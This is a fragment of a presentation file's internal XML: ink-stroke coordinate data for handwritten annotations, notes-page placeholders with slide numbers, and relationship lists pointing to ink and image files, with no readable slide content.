6 0,0 3 0,5 8 0,0-10 0,0-3 0,9-21 0,-5 32 0,-2-8 0,4 11 0,11-14 0,-4-9 0,0 6 0,3 32 0,0-47 0,-6 70 0,3-35 2144,8 21-2144,-2-7 0,1-6 0,9-33 0,11-2 0,-1-1 0,-11-1 0,9 5 0,1 7 0,-15 35 0,-3-2 0,2-3 0,15-20 0,-2 3 0,-7 12 699,-4 20-699,10-19 0,-12 22 0,12-32 0,-17 37 0,27-38 0,-5 36 0,11-26 0,-18 34 0,12-12 0,2-2 0,2-4 0,7-4 0,-1 0 0,-8 8 0,26-22 0,7-6 0,-34 29 0,1-2 0,24-23 0,10-12 0,-7 8 0,-10 10 0,-2 0 0,3-7 0,6-7 0,-3 3 0,5-2 0,-2 0-1093,-12 8 1,2-3 0,-8 5-172,-6 8 0,-4 2 1264,4-10 0,-1 4-351,18-7 351,2-7 0,-17 17 0,-3 1 0,5-12 0,1 6 0,-3 2 0,-10 8 0,31-11 0,-52 38 0,15 9 0,-12-6 0,13 1 0,-11-1 0,50-12 0,-28 1 0,30-3 0,-33-2 0,5 10 0,5 0 0,25-10 0,-13 7 0,1 3 0,17-3 0,-5-2 0,3-3 0,-29 9 0,0-2 1638,28-11 0,-1 0-92,4-11-1077,-7 7-469,-11 6 0,-10 9 0,-9 11 0,48-4 0,-37 11 0,37-4 0,-48-2 0,4-4 0,2-2 0,8-5 0,0-2 0,-1-2 865,-9-2-865,5-13 0,1-2 0,1-1 0,-13 7 0,-3 2 0,-7 12 0,1 2 0,-13 10 0,31-9 0,-19 15 0,21-13 0,3-2 0,-8 10 0,6-11 0,5 1 0,29 13 0,-19 0 0,12 0 0,-3 0 0,12 3 0,2 0-942,-1 1 0,7 0 0,-9-3 942,-10-1 0,3-5-656,-10-5 1,14-5-1,5-2 1,-3 0 0,-11 3-202,-2 2 0,-8 1 0,8-1 857,0-2 0,9-2 0,3-1 0,-5 2 0,-12 4 0,10 1 0,-4 3 0,8-1 0,8-1 0,-7-2 0,-1-6 0,-3-1-353,-12 7 1,1 0 0,-11-2 352,16-19 723,-22 14 0,0 2-723,8-1 0,-3-1 0,-1 4 3276,3 15-1894,16-16 1,4-4-1383,-28 14 0,0-1-291,21-11 1,0-1 290,18 0 0,-10 2 0,3 0 0,-23 5 0,2 1 0,3-1 0,6-2 0,-7 3 0,-15 2 0,1 0 0,16-3 0,7 0 0,-5 2 0,-6 3 0,-1 1 0,28-7 0,-8 4 0,-22 11 0,-6-2 0,1-1 0,4 2 850,6-10 0,-4-1-850,-23 2 436,20-16-436,-19 14 0,6-2 0,-11 7 0,-3-4 650,-9 9-650,2-3 39,-1 5-39,-7 0 0,30 0 0,-21-5 0,27 4 0,-29-4 0,10 0 0,-13-2 0,6 1 0,-15 1 0,-4 0 0,3 3 0,-4-3 0,5 5 0,11 0 0,-9 0 0,9 0 0,-11-5 0,5-1 0,-3 0 0,3 0 0,-4 6 0,-1 0 0,5-5 0,-8-1 0,-3-6 0,-12 6 0,-4-4 0,-11-2 0,8 0 0,-42-17 0,21 14 0,-29-17 0,21 16 0,-6-5 0,18 8 0,1 5 0,18 3 0,-25-10 0,14 6 0,-46-17 0,30 12 0,-23 1 0,-19-2 0,8 1 0,23 2 0,1 0-253,-51-9 0,6 3 253,36 7 0,33 1 0,-2 9 0,20-4 0,23 18 0,-7-10 0,11 10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1T01:18:24.01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853 1 24575,'-23'0'0,"0"10"0,0-2 0,5 13 0,-13-1 0,-6 21 0,-16 5 0,6 7 0,-10 6 0,22-13 0,-1-9 0,4 0 0,18-23 0,-8 12 0,11-13 0,-1 3 0,1-5 0,4 1 0,-3-6 0,4-1 0,-6-5 0,1 5 0,-1-4 0,-4 14 0,-2-2 0,0 5 0,-4 8 0,10-17 0,0 11 0,2-19 0,4 4 0,-6 5 0,1-7 0,-1 12 0,1-9 0,-1 5 0,6 0 0,-4-4 0,8 3 0,-13 1 0,7 2 0,-3 3 0,1-10 0,8 4 0,-8-9 0,9 9 0,-9-8 0,8 8 0,-8-9 0,4 14 0,-6-12 0,6 12 0,-4-9 0,9 0 0,-5-1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1T01:18:22.26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1818 10703 24575,'-23'-11'0,"-20"-12"0,13-6 0,-13 2 0,-15-25 0,-5-3-921,17 14 1,-3-3 920,1-4 0,1 2 0,-25-20 0,27 17 0,-10-12 0,1-1 0,7 11 0,4 9 0,1 0 0,-22-30 0,-7-12 0,13 13 0,5-2 0,4 2 188,17-22-188,5 27 0,0-4 0,8-4 0,1-3 0,-9-7 0,0-6 0,7 3 0,0-7 0,2 12 0,2 23 0,-1 2-680,1-17 0,-1-7 0,0 17 680,-11 17 1228,-4-33-1228,5 15 0,4 19 0,1-2 0,-2-36 0,-2 4 0,-1-3 0,14 25 0,0 0-189,-7-21 0,1 0 189,7 23 0,1-2 0,-5-39 0,2 0 0,6 43 0,1 0 0,-7-33 0,3 6 0,9 21 0,-5-7 0,-1-3 0,6-12 0,-3 6 0,0 3 0,5 8 0,0-10 0,0-3 0,9-21 0,-5 32 0,-2-8 0,4 11 0,11-14 0,-4-9 0,0 6 0,3 32 0,0-47 0,-6 70 0,3-35 2144,8 21-2144,-2-7 0,1-6 0,9-33 0,11-2 0,-1-1 0,-11-1 0,9 5 0,1 7 0,-15 35 0,-3-2 0,2-3 0,15-20 0,-2 3 0,-7 12 699,-4 20-699,10-19 0,-12 22 0,12-32 0,-17 37 0,27-38 0,-5 36 0,11-26 0,-18 34 0,12-12 0,2-2 0,2-4 0,7-4 0,-1 0 0,-8 8 0,26-22 0,7-6 0,-34 29 0,1-2 0,24-23 0,10-12 0,-7 8 0,-10 10 0,-2 0 0,3-7 0,6-7 0,-3 3 0,5-2 0,-2 0-1093,-12 8 1,2-3 0,-8 5-172,-6 8 0,-4 2 1264,4-10 0,-1 4-351,18-7 351,2-7 0,-17 17 0,-3 1 0,5-12 0,1 6 0,-3 2 0,-10 8 0,31-11 0,-52 38 0,15 9 0,-12-6 0,13 1 0,-11-1 0,50-12 0,-28 1 0,30-3 0,-33-2 0,5 10 0,5 0 0,25-10 0,-13 7 0,1 3 0,17-3 0,-5-2 0,3-3 0,-29 9 0,0-2 1638,28-11 0,-1 0-92,4-11-1077,-7 7-469,-11 6 0,-10 9 0,-9 11 0,48-4 0,-37 11 0,37-4 0,-48-2 0,4-4 0,2-2 0,8-5 0,0-2 0,-1-2 865,-9-2-865,5-13 0,1-2 0,1-1 0,-13 7 0,-3 2 0,-7 12 0,1 2 0,-13 10 0,31-9 0,-19 15 0,21-13 0,3-2 0,-8 10 0,6-11 0,5 1 0,29 13 0,-19 0 0,12 0 0,-3 0 0,12 3 0,2 0-942,-1 1 0,7 0 0,-9-3 942,-10-1 0,3-5-656,-10-5 1,14-5-1,5-2 1,-3 0 0,-11 3-202,-2 2 0,-8 1 0,8-1 857,0-2 0,9-2 0,3-1 0,-5 2 0,-12 4 0,10 1 0,-4 3 0,8-1 0,8-1 0,-7-2 0,-1-6 0,-3-1-353,-12 7 1,1 0 0,-11-2 352,16-19 723,-22 14 0,0 2-723,8-1 0,-3-1 0,-1 4 3276,3 15-1894,16-16 1,4-4-1383,-28 14 0,0-1-291,21-11 1,0-1 290,18 0 0,-10 2 0,3 0 0,-23 5 0,2 1 0,3-1 0,6-2 0,-7 3 0,-15 2 0,1 0 0,16-3 0,7 0 0,-5 2 0,-6 3 0,-1 1 0,28-7 0,-8 4 0,-22 11 0,-6-2 0,1-1 0,4 2 850,6-10 0,-4-1-850,-23 2 436,20-16-436,-19 14 0,6-2 0,-11 7 0,-3-4 650,-9 9-650,2-3 39,-1 5-39,-7 0 0,30 0 0,-21-5 0,27 4 0,-29-4 0,10 0 0,-13-2 0,6 1 0,-15 1 0,-4 0 0,3 3 0,-4-3 0,5 5 0,11 0 0,-9 0 0,9 0 0,-11-5 0,5-1 0,-3 0 0,3 0 0,-4 6 0,-1 0 0,5-5 0,-8-1 0,-3-6 0,-12 6 0,-4-4 0,-11-2 0,8 0 0,-42-17 0,21 14 0,-29-17 0,21 16 0,-6-5 0,18 8 0,1 5 0,18 3 0,-25-10 0,14 6 0,-46-17 0,30 12 0,-23 1 0,-19-2 0,8 1 0,23 2 0,1 0-253,-51-9 0,6 3 253,36 7 0,33 1 0,-2 9 0,20-4 0,23 18 0,-7-10 0,11 10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11T01:18:24.01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853 1 24575,'-23'0'0,"0"10"0,0-2 0,5 13 0,-13-1 0,-6 21 0,-16 5 0,6 7 0,-10 6 0,22-13 0,-1-9 0,4 0 0,18-23 0,-8 12 0,11-13 0,-1 3 0,1-5 0,4 1 0,-3-6 0,4-1 0,-6-5 0,1 5 0,-1-4 0,-4 14 0,-2-2 0,0 5 0,-4 8 0,10-17 0,0 11 0,2-19 0,4 4 0,-6 5 0,1-7 0,-1 12 0,1-9 0,-1 5 0,6 0 0,-4-4 0,8 3 0,-13 1 0,7 2 0,-3 3 0,1-10 0,8 4 0,-8-9 0,9 9 0,-9-8 0,8 8 0,-8-9 0,4 14 0,-6-12 0,6 12 0,-4-9 0,9 0 0,-5-1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0T15:23:03.8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20 24575,'5'-6'0,"4"-2"0,6 7 0,12-4 0,3 5 0,21 0 0,-11 6 0,11-5 0,-14 10 0,-8-10 0,-6 13 0,-9-11 0,-5 14 0,1-11 0,0 12 0,-1-3 0,-4 0 0,4 4 0,-4-4 0,1 0 0,-2-1 0,0-9 0,-3 3 0,4 2 0,-5 1 0,0 7 0,0 5 0,-9-2 0,7 2 0,-11-9 0,7-4 0,-4-5 0,1-1 0,-1 0 0,0 2 0,0 8 0,1-4 0,3 4 0,-2-4 0,7-1 0,-4 1 0,1 0 0,3-1 0,-4 1 0,5-1 0,0 1 0,0 4 0,0-3 0,0 7 0,0-3 0,5 0 0,-4-1 0,3-5 0,0-3 0,2 2 0,-1 2 0,3 5 0,2 4 0,7 8 0,-1-10 0,0 5 0,-10-21 0,-2-6 0,-4-11 0,0 1 0,0 1 0,-4 9 0,3-4 0,-4 4 0,-3-31 0,7 24 0,-7-19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0T15:23:04.5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0 24575,'-5'4'0,"0"-3"0,5 4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9T20:40:31.47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24575,'10'0'0,"0"0"0,-4 4 0,3 2 0,-3 4 0,4 0 0,0 1 0,5-1 0,-3 5 0,3-4 0,-5 4 0,5-4 0,-4-1 0,9 0 0,-9 5 0,4-3 0,0 2 0,1-3 0,0 4 0,4 1 0,-4 0 0,5 3 0,-1-3 0,4 14 0,-8-12 0,9 18 0,-12-10 0,5 6 0,1 5 0,-7-14 0,12 14 0,-16-19 0,15 19 0,-8-11 0,4 5 0,12 1 0,-17-2 0,15-5 0,-17-1 0,3-9 0,-9-4 0,3-1 0,-3-4 0,4 3 0,-4-3 0,3-1 0,-8 4 0,8-7 0,-8 7 0,9-8 0,-9 8 0,8-3 0,-8 4 0,8 0 0,-8 0 0,8 1 0,-8 4 0,9-4 0,-9 9 0,8 0 0,-3-2 0,4 1 0,-4-4 0,3-8 0,-8 11 0,8-11 0,-3 13 0,4-9 0,0 9 0,-4-9 0,3 4 0,-3-5 0,4-4 0,-4 3 0,3-8 0,-8 8 0,4-3 0,-5-5 0,-5-7 0,4-1 0,-4-2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9T20:40:32.75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24575,'5'10'0,"0"1"0,-5 10 0,0 8 0,4-6 0,-2 6 0,2 0 0,-4 2 0,0 8 0,0 1 0,0-9 0,0-6 0,0-10 0,5-5 0,-4 0 0,3 0 0,-4-22 0,0 13 0,0-19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B7250E-0EEC-3342-BAA1-2161A6B2A476}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/22/21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79F8A5-8FD6-EA4C-8C10-4D7FB56422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4692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79F8A5-8FD6-EA4C-8C10-4D7FB564226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1481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1638" y="696913"/>
            <a:ext cx="6184900" cy="34798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E697A42-EC76-804F-9120-277495F1715F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>45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905585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1" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E73086-56A0-2F46-87B5-53608342466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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122882" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9793198F-7789-1347-B97B-579397F7D00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122883" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AED7AA6-E39C-4444-A2FF-664CD41881D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688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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EDFDA499-BCFD-B849-A665-FEA73C002DAA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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42305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79F8A5-8FD6-EA4C-8C10-4D7FB564226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9407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Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894CE2B3-2D03-1C40-B489-06E2B00612E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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2418968F-17BF-E14A-9343-A88002D7D1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29699" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4702B2F1-3681-2A46-A618-185044B9B68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688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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D1EA1115-9228-C545-B279-2B993DEE083F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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90146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79F8A5-8FD6-EA4C-8C10-4D7FB564226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5284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Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7C39BF-E997-CC46-8429-D6873EA98D7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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48130" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D28632E9-82C0-3A4A-BB24-397C9481BF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48131" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A1554A6-8EF3-D841-A4B0-D728A08939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688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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A3172DDE-E33B-5A45-9A00-DCB374FB2673}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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0581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49" name="Shape 829">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2AFA8DD-4D9B-6847-9472-0841CDFCAE1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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130050" name="Shape 830">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C199D4-C732-E042-A5DE-A5AA7DD33EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body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z="1800" dirty="0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983145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Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47EBC475-B6DE-0249-BD64-6536B6D2B9B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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59394" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C438DF6-3197-CF40-9CD9-3FCEA3E271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59395" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DBC258-30BE-B344-9557-94E898C1E7F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688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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9B2ACC27-E198-B84D-97CC-2887F0784B32}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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8704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Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C75B48-F199-6E4A-AD57-266277BA0DF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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63490" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A64F825E-10E0-F246-A3BB-4D0C467208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63491" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{116A87DF-53A6-BB43-9375-B64D21F178A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688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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FBFFCE7A-DA68-5441-B107-470AD318E0F0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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48731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Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18ACA9B-71CD-CC49-A0F1-B7B98701F6D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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65538" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E31F92D2-A507-CD4E-90BE-A5EBFE1A72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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3EACC4-9F5A-1744-9757-B1E3CF1D2D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688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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 defTabSz="928688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DE880CEB-05EF-EF43-B167-0B1B4CF6F186}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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75863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9/22/21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77045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F40B7-36AB-4376-BE14-EF7004D79BB9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/22/21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441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7CAB8-DCAE-46A5-AADA-B3FAD11A54E0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/22/21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6093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2D6C3B98-52C5-7340-A612-57D58E94DBD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"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3E0B833-53AB-2D45-8E4D-ED5A8FB16897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62587986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9/22/21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645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9/22/21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60782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9/22/21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3818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9/22/21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312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9/22/21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228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9/22/21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9672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9/22/21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703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9/22/21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883016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9/22/21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5354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000" b="1" i="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1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1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1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1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1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1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1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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11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6.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink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customXml" Target="../ink/ink1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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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ustomXml" Target="../ink/ink2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1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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customXml" Target="../ink/ink2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customXml" Target="../ink/ink2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customXml" Target="../ink/ink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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27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9.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2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customXml" Target="../ink/ink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7.png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1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink35.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32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4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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customXml" Target="../ink/ink38.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml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37.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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customXml" Target="../ink/ink48.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.pn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7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink49.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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tiff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tiff"/><Relationship Id="rId7" 